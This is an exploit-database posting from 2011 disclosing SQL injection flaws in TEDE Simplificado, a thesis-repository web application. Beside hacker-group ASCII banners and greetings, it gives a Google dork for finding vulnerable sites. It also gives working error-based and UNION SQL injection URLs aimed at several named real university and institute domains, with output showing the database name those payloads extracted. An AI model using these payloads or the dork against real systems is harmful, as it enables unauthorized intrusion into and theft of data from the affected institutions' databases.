Home / exploits TEDE Simplificado SQL Injection
Posted on 01 June 2011
====================================================== TEDE Simplificado <= (Versions) SQL Injection Vulns ====================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 _ __ __ ________ __ __ 3 7 /' /'__` /'__` /\_____ / / 7 1 /\_, /\_L /\_L \/___//'/' \_ \____ 1 3 /_/ /_/_\_<_/_/_\_<_ /' /' /'_` '__` 3 3 / L / L /' /' / L L 3 7 \_ \____/ \____//\_/ \___,_ \_,__/ 7 1 /_//___/ /___/ // /__,_ //___/ 1 3 >> Exploit database separated by exploit 3 3 type (local, remote, DoS, etc.) 3 7 7 1 [+] Site : 1337db.com 1 3 [+] Support e-mail : submit[at]1337db.com 3 3 3 7 ############################################ 7 1 I'm KnocKout 1337 Member from 1337 DataBase 1 3 ############################################ 3 3 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com [~] HomePage : http://h4x0resec.blogspot.com [~] Reference : http://h4x0resec.blogspot.com [~] Special Thanks : Kalashinkov3 <= :) ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : desenvolvido |~Price : N/A |~Version : N/A |~Software: http://www.ibict.br/ |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~sqL : MysqL |~Google DORK : inurl:/tde_busca/ -- Good.:) |[~]Date : "26.11.2010" |[~]Tested on : Demo's Apache MySQL >=4.1 MySQL >=5 ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ processaPesquisa.php tde_fut.php Files Not Sec. http://Target/tde_busca/processaPesquisa.php?pesqExecutada={ID]&id={ID} SQL Inject! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== For Version : v-IBICT - http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663 {SQL] http://tede.ibict.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=663%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 MYSQL WRÝTES : Query failed (autor): Duplicate entry '~'TDE'~1' for key 1 Database Found : TGE To be continue! For Version : v1.01 http://etd.uns.edu.ar/tde_busca/tde_fut.php?id=10%20union%20select%201,2,3,4 For Version : vS2.04 http://www.bdtd.ndc.uff.br/tde_busca/processaPesquisa.php?pesqExecutada=1&id=2951%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1 ============================================================= .__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ \n| Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \n\_____ | __)_ / / / | \ \____ /_______ //_______ / \______ / / / / Was Here. # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) # Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz # gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
